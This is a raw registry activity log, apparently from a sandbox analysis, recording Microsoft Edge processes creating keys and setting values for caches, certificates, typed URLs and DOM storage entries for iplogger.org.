\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\iplogger.org\Total = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\iplogger.org MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\iplogger.org\Total = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000b7cdd8ec9fd16539f1217dd4081d6c25af67b09ec3d39f367cabcc4b48d0c47cdf5d104224c181ac5f7361b5e2a2f25362e87076b869ae785689 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = eafd1a5d55bfd601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\iplogger.org\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b2b41a5a55bfd601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{2D3BB740-B253-4416-B6AA-8344D75C3C81}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "pqss5k3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz! MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\ MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1614e56b55bfd601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\MrtCache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 67db6b5555bfd601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\iplogger.org\Total = "651" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = d02603b987bfd601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\Enabled = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\iplogger.org\Total = "669" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000ce8d5a1358ad2b7d3c3bba2a9bceb8a7f65eae8befc929cbfd34131681eff3762dcb5a36f714d81cb3a46e5906b1ec79c956a969910195ef732d0a3fda2670c6e9c5aa3c4f45a83009b340a4ada40d1c2f1c96b18cd21752bd5ada055dbf2ac6249d3de6d4decb4b518770d393490cb40ace3b8ca5dc3eb8d4dcf26347587ba8ee710e38f9800c84d83fd3c43b3ff78c128dc93b8dbfc8e575d460690892a5317763681d2fccba8cdbfd525dd5250f2c29796ee7301b244257605447d30db688c99132d7e460ee675fe095eced9d2f7363b2a8311b90551181a11eb08e693d2bb71d683c73de4da372086fff7646ffd06b587da345be0a37f4b75780e746e5e30e2607cc99e4d928f894e2adafbf7486428bd8e017459c9013c384bb7845acd5b8cb7b8c6814c198a7a642f3e0aa04f6576b98b566c54cd9e5e333dc54043496212ea7ba540c453efb5d96e54aa6ce0b2118fdeba9ddfb20be38556b2c248557806d424f9e6d79891dd97f37a85275a82fb2eff2802fb1d266e321f0f545df245daaec484cd82b1e7b3a560b0650432850592e5ac35a4b4d0d66a914ec60191e8e68a4f5928f MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\Certi MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 30ea327f25c2d601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000006aeaf4838407ca410cdc56fb27da3bb54a6cda54d811464b390d9df01f577a0d73c52b5c6f966bdc64cf1fc22e203a9bb939d5f735c91e567387841ea209431c0e4d74cf571ecc5ecad7cf7604741a1238876fe8e67b094cfbc1 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) 